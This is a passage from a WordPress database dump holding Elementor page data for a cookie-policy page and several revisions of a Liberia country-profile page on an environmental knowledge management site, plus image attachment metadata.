preferences.<\\/p><\\/li><\\/ul><h2><strong>Third Party Cookies<\\/strong><\\/h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.<\\/p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.<\\/p><p>For more information on Google Analytics cookies, see the official Google Analytics page.<\\/p><\\/li><li><p>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.<\\/p><\\/li><li><p>We also use social media buttons and\\/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.<\\/p><\\/li><\\/ul><p><strong>More Information<\\/strong><\\/p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site.\\u00a0<\\/p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:<\\/p><ul><li>Email: <a href=\\\"mailto:contact@ekmsliberia.info\\\">contact@ekmsliberia.info<\\/a><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4292,435,'_elementor_edit_mode','builder'),(4293,435,'_elementor_template_type','wp-page'),(4294,435,'_elementor_version','2.7.5'),(4295,435,'_wp_page_template','default'),(4296,435,'_elementor_data','[{\"id\":\"f41560c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"81ad8aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c2af956\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8dc9f7b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cookie Policy for Environmental Knowledge Management System\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5d7f54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-size: 15px;\\\">This is the Cookie Policy for Environmental Knowledge Management System, accessible from <\\/span><a style=\\\"font-size: 15px; background-color: #ffffff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\\">https:\\/\\/ekmsliberia.info<\\/a><\\/p><h2><strong>What Are Cookies<\\/strong><\\/h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.<\\/p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.<\\/p><h2><strong>How We Use Cookies<\\/strong><\\/h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.<\\/p><h2><strong>Disabling Cookies<\\/strong><\\/h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.<\\/p><h2><strong>The Cookies We Set<\\/strong><\\/h2><ul><li><p>Account related cookies<\\/p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.<\\/p><\\/li><li><p>Login related cookies<\\/p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.<\\/p><\\/li><li><p>Email newsletters related cookies<\\/p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed\\/unsubscribed users.<\\/p><\\/li><li><p>Forms related cookies<\\/p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.<\\/p><\\/li><li><p>Site preferences cookies<\\/p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.<\\/p><\\/li><\\/ul><h2><strong>Third Party Cookies<\\/strong><\\/h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.<\\/p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.<\\/p><p>For more information on Google Analytics cookies, see the official Google Analytics page.<\\/p><\\/li><li><p>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.<\\/p><\\/li><li><p>We also use social media buttons and\\/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.<\\/p><\\/li><\\/ul><p><strong>More Information<\\/strong><\\/p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site.\\u00a0<\\/p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:<\\/p><ul><li>Email: <a href=\\\"mailto:contact@ekmsliberia.info\\\">contact@ekmsliberia.info<\\/a><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4298,102,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:11:\"header_size\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(4319,76,'rank_math_permalink','country-profile'),(4320,76,'ofc_enable_fullscreen','disable'),(4321,76,'ofc_fullscreen_nav','enable'),(4322,76,'ofc_fullscreen_nav_pos','right'),(4323,76,'osh_disable_topbar_sticky','default'),(4324,76,'osh_disable_header_sticky','default'),(4325,76,'osh_sticky_header_style','default'),(4326,76,'_elementor_edit_mode','builder'),(4327,76,'_elementor_template_type','wp-page'),(4328,76,'_elementor_version','2.7.5'),(4329,76,'_wp_page_template','default'),(4330,76,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Republic of Liberia\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia\\u00a0approximately 111,369 km<sup>2<\\/sup>, is the fifth smallest country in Africa.<\\/p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005). The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km<sup>2<\\/sup> consist of water, and the remaining 96,319 km<sup>2<\\/sup> are land.<\\/p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.<\\/p><p>Liberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km<sup>2<\\/sup>, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4331,437,'_elementor_controls_usage','a:0:{}'),(4332,437,'_elementor_edit_mode','builder'),(4333,437,'_elementor_template_type','wp-page'),(4334,437,'_elementor_version','2.7.5'),(4335,437,'_wp_page_template','default'),(4336,437,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\\n\\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\\n\\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\\n\\nLiberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4339,438,'_elementor_edit_mode','builder'),(4340,438,'_elementor_template_type','wp-page'),(4341,438,'_elementor_version','2.7.5'),(4342,438,'_wp_page_template','default'),(4343,438,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Liberia\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\\n\\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\\n\\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\\n\\nLiberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4347,439,'_elementor_edit_mode','builder'),(4348,439,'_elementor_template_type','wp-page'),(4349,439,'_elementor_version','2.7.5'),(4350,439,'_wp_page_template','default'),(4351,439,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Liberia\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\\n\\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\\n\\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\\n\\nLiberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4354,440,'_wp_attached_file','2019/11/seal.png'),(4355,440,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:293;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2019/11/seal.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"seal-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"seal-293x300.png\";s:5:\"width\";i:293;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4357,441,'_elementor_edit_mode','builder'),(4358,441,'_elementor_template_type','wp-page'),(4359,441,'_elementor_version','2.7.5'),(4360,441,'_wp_page_template','default'),(4361,441,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Liberia\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\\n\\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\\n\\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\\n\\nLiberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4365,442,'_elementor_edit_mode','builder'),(4366,442,'_elementor_template_type','wp-page'),(4367,442,'_elementor_version','2.7.5'),(4368,442,'_wp_page_template','default'),(4369,442,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Liberia\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\\n\\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of the equator and longitudes 11\\u00b028\\u2018W and 7\\u00b032\\u2018W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\\n\\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. C\\u00f4te d\\u2018Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with C\\u00f4te d\\u2018Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\\n\\nLiberia\\u2018s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4373,443,'_elementor_edit_mode','builder'),(4374,443,'_elementor_template_type','wp-page'),(4375,443,'_elementor_version','2.7.5'),(4376,443,'_wp_page_template','default'),(4377,443,'_elementor_data','[{\"id\":\"1872628\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b20d6bb\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c40d80d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1b2428a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/seal.png\",\"id\":440},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"90\",\"height\":\"90\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0a34da5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Liberia\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f41b210\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Republic of Liberia, a relatively small country of approximately 111,369 km2, is located entirely within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia is the fifth smallest country on the African Continent.\\n\\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4\\u00b021\\u2018N and 8\\u00b033\\u2018 north of 